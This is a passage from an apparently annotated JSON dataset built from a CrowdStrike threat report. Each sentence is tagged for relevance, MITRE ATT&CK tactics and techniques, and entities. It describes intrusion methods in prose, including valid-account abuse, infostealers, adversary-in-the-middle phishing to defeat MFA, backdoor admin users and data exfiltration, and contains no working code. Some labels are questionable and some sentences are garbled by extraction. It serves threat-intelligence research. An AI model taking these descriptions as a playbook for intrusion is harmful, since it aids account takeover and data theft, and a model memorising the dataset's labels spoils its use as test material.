were consistent throughout 2024.", "sentence_text": "This number fell to 13% in 2024, partly because numerous nation-state and opportunistic threat actors are increasingly targeting the cloud control plane.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s250-ded5b1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 250, "context_before": "This number fell to 13% in 2024, partly because numerous nation-state and opportunistic threat actors are increasingly targeting the cloud control plane.", "sentence_text": "Many of these threat actors have adopted and employed techniques similar to those previously used by SCATTERED SPIDER, including moving laterally to cloud-hosted virtual machines (VMs) via management tools.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p29-s251-75be95", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 29, "sentence_id": 251, "context_before": "Many of these threat actors have adopted and employed techniques similar to those previously used by SCATTERED SPIDER, including moving laterally to cloud-hosted virtual machines (VMs) via management tools.", "sentence_text": "The tactics observed in these intrusions varied significantly; some threat actors opportunistically queried the cloud control plane after host-based exploitation, and others specifically targeted cloud environments via access keys with little or no host-based interaction.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s252-072b6a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 252, "context_before": "The tactics observed in these intrusions varied significantly; some threat actors opportunistically queried the cloud control plane after host-based exploitation, and others specifically targeted cloud environments via access keys with little or no host-based interaction.", "sentence_text": "Cloud-Conscious China-Nexus Actors China-nexus actors developed cloud-conscious techniques throughout 2024 and are increasingly targeting and abusing cloud environments for data collection.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s253-b366d4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 253, "context_before": "Cloud-Conscious China-Nexus Actors China-nexus actors developed cloud-conscious techniques throughout 2024 and are increasingly targeting and abusing cloud environments for data collection.", "sentence_text": "The increase in unattributed cloud intrusions corresponds with an incremental increase in suspected China-nexus incidents overall.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s254-4d7330", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 254, "context_before": "The increase in unattributed cloud intrusions corresponds with an incremental increase in suspected China-nexus incidents overall.", "sentence_text": "Suspected China-nexus cloud intrusions increased 6% in 2024 across multiple cloud services, including Alibaba and Azure.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s255-ce0a7a", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 255, "context_before": "Suspected China-nexus cloud intrusions increased 6% in 2024 across multiple cloud services, including Alibaba and Azure.", "sentence_text": "Cloud-Conscious DPRK-Nexus Actors DPRK-nexus adversary LABYRINTH CHOLLIMA consistently targeted cloud environments, compromising developer workstations via backdoored GitHub projects before pivoting to the cloud by using cached credentials.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "LABYRINTH CHOLLIMA compromises developer workstations via backdoored GitHub projects and pivots to cloud environments using cached credentials.", "entities": [ { "text": "LABYRINTH CHOLLIMA", "start": 55, "end": 73, "label": "ThreatActor" }, { "text": "compromising developer workstations via backdoored GitHub projects", "start": 116, "end": 182, "label": "Action" }, { "text": "pivoting to the cloud by using cached credentials", "start": 190, "end": 239, "label": "Action" }, { "text": "GitHub", "start": 167, "end": 173, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s256-578bcf", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 256, "context_before": "Cloud-Conscious DPRK-Nexus Actors DPRK-nexus adversary LABYRINTH CHOLLIMA consistently targeted cloud environments, compromising developer workstations via backdoored GitHub projects before pivoting to the cloud by using cached credentials.", "sentence_text": "FAMOUS CHOLLIMA also emerged as a cloud-conscious adversary in 2024, frequently gaining access to cloud environments as an insider threat and then establishing persistence via a backdoor administrator user.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "FAMOUS CHOLLIMA gains access to cloud environments as an insider threat and establishes persistence by creating a backdoor administrator user.", "entities": [ { "text": "FAMOUS CHOLLIMA", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "gaining access to cloud environments as an insider threat", "start": 80, "end": 137, "label": "Action" }, { "text": "establishing persistence via a backdoor administrator user", "start": 147, "end": 205, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s257-ae0a11", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 257, "context_before": "FAMOUS CHOLLIMA also emerged as a cloud-conscious adversary in 2024, frequently gaining access to cloud environments as an insider threat and then establishing persistence via a backdoor administrator user.", "sentence_text": "Access to Valid Accounts Facilitates Initial Access Techniques", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s258-517ba3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 258, "context_before": "Access to Valid Accounts Facilitates Initial Access Techniques", "sentence_text": "Abusing valid accounts has become the primary initial access vector to the cloud, accounting for 35% of cloud incidents in the first half of 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s259-287f29", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 259, "context_before": "Abusing valid accounts has become the primary initial access vector to the cloud, accounting for 35% of cloud incidents in the first half of 2024.", "sentence_text": "Attackers are increasingly using stealth-oriented tactics and attempting to access credentials to target valid accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s260-52d0f5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 260, "context_before": "Attackers are increasingly using stealth-oriented tactics and attempting to access credentials to target valid accounts.", "sentence_text": "They do not change the credentials, which would notify the user of illicit access.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s261-67c7f4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 261, "context_before": "They do not change the credentials, which would notify the user of illicit access.", "sentence_text": "Emerging threat actors are likely to continue exploring similar methods to access valid cloud accounts, as this allows for more reliable access to cloud environments with a lower detection risk.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s262-2ffb03", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 262, "context_before": "Emerging threat actors are likely to continue exploring similar methods to access valid cloud accounts, as this allows for more reliable access to cloud environments with a lower detection risk.", "sentence_text": "Though this trend continued into 2024, threat actors also began to explore other mechanisms to access valid accounts via credentials and trust relationships.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s263-942db7", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 263, "context_before": "Though this trend continued into 2024, threat actors also began to explore other mechanisms to access valid accounts via credentials and trust relationships.", "sentence_text": "»ABUSING VALID ACCOUNTS HAS One likely initial access mechanism is leveraging information stealers; during 2024, BECOME THE PRIMARY INITIAL ACCESS VECTOR TO THE CLOUD, ACCOUNTING threat actors updated Stealc and Vidar to target cloud accounts.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "Threat actors updated Stealc and Vidar malware to target cloud accounts.", "entities": [ { "text": "Stealc", "label": "MalwareTool", "start": 201, "end": 207 }, { "text": "Vidar", "label": "MalwareTool", "start": 212, "end": 217 }, { "text": "updated Stealc and Vidar to target cloud accounts", "label": "Action", "start": 193, "end": 242 } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s264-e92503", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 264, "context_before": "»ABUSING VALID ACCOUNTS HAS One likely initial access mechanism is leveraging information stealers; during 2024, BECOME THE PRIMARY INITIAL ACCESS VECTOR TO THE CLOUD, ACCOUNTING threat actors updated Stealc and Vidar to target cloud accounts.", "sentence_text": "These stealers FOR 35% OF CLOUD INCIDENTS provide attackers with instant access to cloud credentials and email lists that can IN THE FIRST HALF OF 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s265-521c02", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 265, "context_before": "These stealers FOR 35% OF CLOUD INCIDENTS provide attackers with instant access to cloud credentials and email lists that can IN THE FIRST HALF OF 2024.", "sentence_text": "be leveraged for password spraying and phishing.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s266-39c413", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 266, "context_before": "be leveraged for password spraying and phishing.", "sentence_text": "Another method for credential collection involves abusing trust relationships to gain access to cloud accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s267-c50ef3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 267, "context_before": "Another method for credential collection involves abusing trust relationships to gain access to cloud accounts.", "sentence_text": "More adversaries used connections between business partners and their cloud tenants to access environments without needing to obtain credentials in the victim tenant.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": null, "procedure": "Adversaries used connections between business partners and cloud tenants to access environments without obtaining credentials.", "entities": [ { "text": "used connections between business partners and their cloud tenants to access environments", "start": 17, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s268-9b0003", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 268, "context_before": "More adversaries used connections between business partners and their cloud tenants to access environments without needing to obtain credentials in the victim tenant.", "sentence_text": "FAMOUS CHOLLIMA capitalized on another form of trusted relationships as an insider threat to deploy a backdoor in a cloud tenant after one of their operators was hired at the target organization.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1199", "name": "Trusted Relationship" } ], "procedure": "Threat actor leveraged insider access via trusted relationships to deploy a backdoor in a cloud tenant.", "entities": [ { "text": "FAMOUS CHOLLIMA ", "start": 0, "end": 16, "label": "ThreatActor" }, { "text": "backdoor", "start": 102, "end": 110, "label": "MalwareTool" }, { "text": " cloud tenant", "start": 115, "end": 128, "label": "Infrastructure_Indicator" }, { "text": "capitalized on another form of trusted relationships as an insider threat to deploy", "start": 16, "end": 99, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p30-s269-9ffdcb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 30, "sentence_id": 269, "context_before": "FAMOUS CHOLLIMA capitalized on another form of trusted relationships as an insider threat to deploy a backdoor in a cloud tenant after one of their operators was hired at the target organization.", "sentence_text": "This adversary is a particularly concerning insider threat, as their operators are often hired in developer positions and given access to cloud accounts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s270-63e9e0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 270, "context_before": "This adversary is a particularly concerning insider threat, as their operators are often hired in developer positions and given access to cloud accounts.", "sentence_text": "Password spraying techniques evolved significantly in 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s271-4c5b34", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 271, "context_before": "Password spraying techniques evolved significantly in 2024.", "sentence_text": "The threat actor then performed automated exfiltration of all SharePoint documents (Figure 14).", "relevant": "yes", "tactic": [ { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1567", "name": "Exfiltration Over Web Services" } ], "procedure": "The threat actor performed automated exfiltration of SharePoint documents.", "entities": [ { "text": "threat actor", "start": 4, "end": 16, "label": "ThreatActor" }, { "text": "performed automated exfiltration of all SharePoint documents", "start": 22, "end": 82, "label": "Action" }, { "text": "SharePoint", "start": 62, "end": 72, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s273-6562e5", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 273, "context_before": "ERROR:", "sentence_text": "INVALID ERROR:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s274-54a421", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 274, "context_before": "INVALID ERROR:", "sentence_text": "VALID SUCCESSFUL AUTOMATED LOGIN EXFILTRATION INITIAL ACCESS: ACTIONS ON OBJECTIVE:\n6 MINUTES, 4 SECONDS 13 MINUTES, 42 SECONDS SCATERED SPIDER’s diminished operational tempo in 2024 likely accounts for the reduced number of phishing-related cloud intrusions throughout the year.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s275-a47770", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 275, "context_before": "VALID SUCCESSFUL AUTOMATED LOGIN EXFILTRATION INITIAL ACCESS: ACTIONS ON OBJECTIVE:\n6 MINUTES, 4 SECONDS 13 MINUTES, 42 SECONDS SCATERED SPIDER’s diminished operational tempo in 2024 likely accounts for the reduced number of phishing-related cloud intrusions throughout the year.", "sentence_text": "However, some threat actors are using AITM-based phishing, which proxies the phished user’s authentication requests to the cloud authentication service being targeted.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Threat actors use adversary-in-the-middle phishing to proxy a victim user's authentication requests to the targeted cloud authentication service.", "entities": [ { "text": "threat actors", "start": 14, "end": 27, "label": "ThreatActor" }, { "text": "are using AITM-based phishing", "start": 28, "end": 57, "label": "Action" }, { "text": "proxies the phished user’s authentication requests to the cloud authentication service being targeted", "start": 65, "end": 166, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s276-973f28", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 276, "context_before": "However, some threat actors are using AITM-based phishing, which proxies the phished user’s authentication requests to the cloud authentication service being targeted.", "sentence_text": "This allows the threat actor to prompt the user for an MFA token as well, circumventing one of the primary cloud account security controls.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": null, "procedure": "The threat actor prompts the user for an MFA token, thereby bypassing a cloud account security control.", "entities": [ { "text": "the threat actor", "start": 12, "end": 28, "label": "ThreatActor" }, { "text": "prompt the user for an MFA token", "start": 32, "end": 64, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s277-d920eb", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 277, "context_before": "This allows the threat actor to prompt the user for an MFA token as well, circumventing one of the primary cloud account security controls.", "sentence_text": "Defense Evasion Trends Similar to other security domains, cloud-conscious threat actors are consistently attempting to evade defender detections and security controls.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s278-ee52c4", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 278, "context_before": "Defense Evasion Trends Similar to other security domains, cloud-conscious threat actors are consistently attempting to evade defender detections and security controls.", "sentence_text": "Indicator removal continues to be the most common defense evasion tactic.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s279-498941", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 279, "context_before": "Indicator removal continues to be the most common defense evasion tactic.", "sentence_text": "This tactic is primarily driven by SCATTERED SPIDER and other adversaries hampering email-based detection of malicious activity, a method used in approximately 75% of cases in which indicators were removed in the first half of 2024 and in 78% of these cases in the second half of 2023.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s280-3cf632", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 280, "context_before": "This tactic is primarily driven by SCATTERED SPIDER and other adversaries hampering email-based detection of malicious activity, a method used in approximately 75% of cases in which indicators were removed in the first half of 2024 and in 78% of these cases in the second half of 2023.", "sentence_text": "Threat actors are also consistently attempting to evade policy-based security controls implemented by defenders.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s281-2039ef", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 281, "context_before": "Threat actors are also consistently attempting to evade policy-based security controls implemented by defenders.", "sentence_text": "This is primarily done by implementing alternate MFA methods on compromised identities and bypassing cloud firewall segmentation.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1556", "name": "Modify Authentication Process" } ], "procedure": "Implement alternate MFA methods on compromised identities and bypass cloud firewall segmentation to evade security controls.", "entities": [ { "text": "implementing alternate MFA methods on compromised identities", "start": 26, "end": 86, "label": "Action" }, { "text": "bypassing cloud firewall segmentation", "start": 91, "end": 128, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p31-s282-6241e1", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 31, "sentence_id": 282, "context_before": "This is primarily done by implementing alternate MFA methods on compromised identities and bypassing cloud firewall segmentation.", "sentence_text": "In addition to these ongoing tactics, 2024 saw the emergence and continued development of more stealthy initial access and credential collection techniques, which enable further defense evasion in cloud intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s283-455260", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 283, "context_before": "In addition to these ongoing tactics, 2024 saw the emergence and continued development of more stealthy initial access and credential collection techniques, which enable further defense evasion in cloud intrusions.", "sentence_text": "COMMON ATTACK PATHS AND TACTICS IN CLOUD INTRUSIONS intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s284-f4c834", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 284, "context_before": "COMMON ATTACK PATHS AND TACTICS IN CLOUD INTRUSIONS intrusion.", "sentence_text": "Though threat actors may not use all of the displayed techniques in a given intrusion, multiple threat actors with varying motivations have used each technique across various cloud attacks.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s285-5d7149", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 285, "context_before": "Though threat actors may not use all of the displayed techniques in a given intrusion, multiple threat actors with varying motivations have used each technique across various cloud attacks.", "sentence_text": "Although threat actors have numerous methods to gain initial access, this illustrates the value of valid accounts in a successful cloud intrusion.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s286-8753dd", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 286, "context_before": "Although threat actors have numerous methods to gain initial access, this illustrates the value of valid accounts in a successful cloud intrusion.", "sentence_text": "These allow the threat actor to access the cloud control plane and use several other techniques for persistence, privilege escalation, defense evasion, discovery, collection, and impact.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": null, "procedure": "Access the cloud control plane using valid accounts and leverage additional techniques across multiple attack stages.", "entities": [ { "text": "access the cloud control plane", "start": 32, "end": 62, "label": "Action" }, { "text": "use several other techniques for persistence, privilege escalation, defense evasion, discovery, collection, and impact", "start": 67, "end": 185, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s287-f5097e", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 287, "context_before": "These allow the threat actor to access the cloud control plane and use several other techniques for persistence, privilege escalation, defense evasion, discovery, collection, and impact.", "sentence_text": "Once the threat actor has access to a valid account, they often use it to collect more credentials from secured and unsecured sources so that they can access more accounts and further their activity.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1580", "name": "Cloud Infrastructure Discovery" } ], "procedure": "Use a valid account to collect additional credentials from secured and unsecured sources in order to access more accounts and continue malicious activity.", "entities": [ { "text": "threat actor", "start": 9, "end": 21, "label": "ThreatActor" }, { "text": "use it to collect more credentials from secured and unsecured sources", "start": 64, "end": 133, "label": "Action" }, { "text": "access more accounts", "start": 151, "end": 171, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s288-855a26", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 288, "context_before": "Once the threat actor has access to a valid account, they often use it to collect more credentials from secured and unsecured sources so that they can access more accounts and further their activity.", "sentence_text": "A valid account also allows them to access and execute commands on cloud-hosted VM infrastructure using tools such as a cloud VM management service, thus enabling them to collect files or deploy malware or ransomware.", "relevant": "yes", "tactic": [ { "id": "TA0002", "name": "Execution" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" }, { "id": "T1651", "name": "Cloud Administration Command" } ], "procedure": "Use a valid account to access cloud-hosted VM infrastructure, execute commands through a cloud VM management service, and enable file collection or malware or ransomware deployment.", "entities": [ { "text": "valid account", "start": 2, "end": 15, "label": "Infrastructure_Indicator" }, { "text": "access and execute commands on cloud-hosted VM infrastructure", "start": 36, "end": 97, "label": "Action" }, { "text": "cloud-hosted VM infrastructure", "start": 67, "end": 97, "label": "Infrastructure_Indicator" }, { "text": "using tools such as a cloud VM management service", "start": 98, "end": 147, "label": "Action" }, { "text": "cloud VM management service", "start": 120, "end": 147, "label": "MalwareTool" }, { "text": "collect files", "start": 171, "end": 184, "label": "Action" }, { "text": "deploy malware or ransomware", "start": 188, "end": 216, "label": "Action" } ] }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s289-e04aa8", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 289, "context_before": "A valid account also allows them to access and execute commands on cloud-hosted VM infrastructure using tools such as a cloud VM management service, thus enabling them to collect files or deploy malware or ransomware.", "sentence_text": "Each adversary’s path depends on their goals and the hosting location of their target data.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s290-a1500d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 290, "context_before": "Each adversary’s path depends on their goals and the hosting location of their target data.", "sentence_text": "eCrime actors abuse cloud services to efficiently deploy ransomware and increase the deployment’s impact.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p32-s291-a21dce", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 32, "sentence_id": 291, "context_before": "eCrime actors abuse cloud services to efficiently deploy ransomware and increase the deployment’s impact.", "sentence_text": "Cloud-conscious state-nexus actors employ stealthier cloud tactics to gain long-term access to data with a lower risk of detection and meet their collection requirements.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p33-s292-6bee6d", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 33, "sentence_id": 292, "context_before": "Cloud-conscious state-nexus actors employ stealthier cloud tactics to gain long-term access to data with a lower risk of detection and meet their collection requirements.", "sentence_text": "INITIAL ACCESS CREDENTIAL ACCESS Phish for credentials PHISHING Credentials managers STORED CREDENTIALS", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p33-s293-7df3a0", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 33, "sentence_id": 293, "context_before": "INITIAL ACCESS CREDENTIAL ACCESS Phish for credentials PHISHING Credentials managers STORED CREDENTIALS", "sentence_text": "Access to new accounts VALID Actor accesses a valid account ACCOUNT Credentials in SaaS solutions UNSECURED EXPLOIT PUBLIC-FACING CREDENTIALS SERVICE EXECUTION", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p33-s294-a11c34", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 33, "sentence_id": 294, "context_before": "Access to new accounts VALID Actor accesses a valid account ACCOUNT Credentials in SaaS solutions UNSECURED EXPLOIT PUBLIC-FACING CREDENTIALS SERVICE EXECUTION", "sentence_text": "Command line tools from compromised VMs with cached credentials VM management tools VIRTUAL MACHINE-BASED EXECUTION Search for unsecured credentials on compromised infrastructure CLOUD COMMAND LINE TOOLS PRIVILEGE ESCALATION Add identity to admin groups and roles PRIVILEGE ESCALATION PERSISTENCE Add alternate authentication mechanism USER IDENTITY PERSISTENCE PLANE Add credentials to service principal or application PROGRAMMATIC IDENTITIES", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p33-s295-9ab35f", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 33, "sentence_id": 295, "context_before": "Command line tools from compromised VMs with cached credentials VM management tools VIRTUAL MACHINE-BASED EXECUTION Search for unsecured credentials on compromised infrastructure CLOUD COMMAND LINE TOOLS PRIVILEGE ESCALATION Add identity to admin groups and roles PRIVILEGE ESCALATION PERSISTENCE Add alternate authentication mechanism USER IDENTITY PERSISTENCE PLANE Add credentials to service principal or application PROGRAMMATIC IDENTITIES", "sentence_text": "Add SSH keys to VM PERSISTENCE deploymentMalware HOST-BASED PERSISTENCE DEFENSE EVASION CONTROL Impair email or cloud logging-based detection THREAT DETECTIONEVASION ACTOR Tamper with identity or virtual network policies SECURITY CONTROL EVASION CLOUD DISCOVERY Enumerate identities, groups, and roles IDENTITY ENUMERATION Enumerate VMs and storage solutions", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p33-s296-502149", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 33, "sentence_id": 296, "context_before": "Add SSH keys to VM PERSISTENCE deploymentMalware HOST-BASED PERSISTENCE DEFENSE EVASION CONTROL Impair email or cloud logging-based detection THREAT DETECTIONEVASION ACTOR Tamper with identity or virtual network policies SECURITY CONTROL EVASION CLOUD DISCOVERY Enumerate identities, groups, and roles IDENTITY ENUMERATION Enumerate VMs and storage solutions", "sentence_text": "INFRASTRUCTURE AND STORAGE ENUMERATION COLLECTION Download data from SaaS solutions SaaS COLLECTION Download data through cloud control plane Threat actor accesses cloud infrastructure CLOUD INFRASTRUCTURE COLLECTION directly for collection IMPACT Mining software Create new resources for later use deployment RESOURCE HIJACKING Ransomware DATA ENCRYPTION/ deployment DESTRUCTION/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s298-ae35b3", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 298, "context_before": "EXTORTION", "sentence_text": "ENTERPRISING VULNERABILITY\nEXPLOITATION\nIn 2024, threat actors continued to target devices in the network periphery, where traditional EDR visibility is often limited.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s299-87dd2c", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 299, "context_before": "ENTERPRISING VULNERABILITY\nEXPLOITATION\nIn 2024, threat actors continued to target devices in the network periphery, where traditional EDR visibility is often limited.", "sentence_text": "Exploiting unmanaged internet-exposed hosts, particularly network appliances, remained a popular initial access vector throughout 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-46_crowdstrike_report-p34-s300-6d9666", "source": "crowdstrike", "doc_id": "46_crowdstrike_report", "page_number": 34, "sentence_id": 300, "context_before": "Exploiting unmanaged internet-exposed hosts, particularly network appliances, remained a popular initial access vector 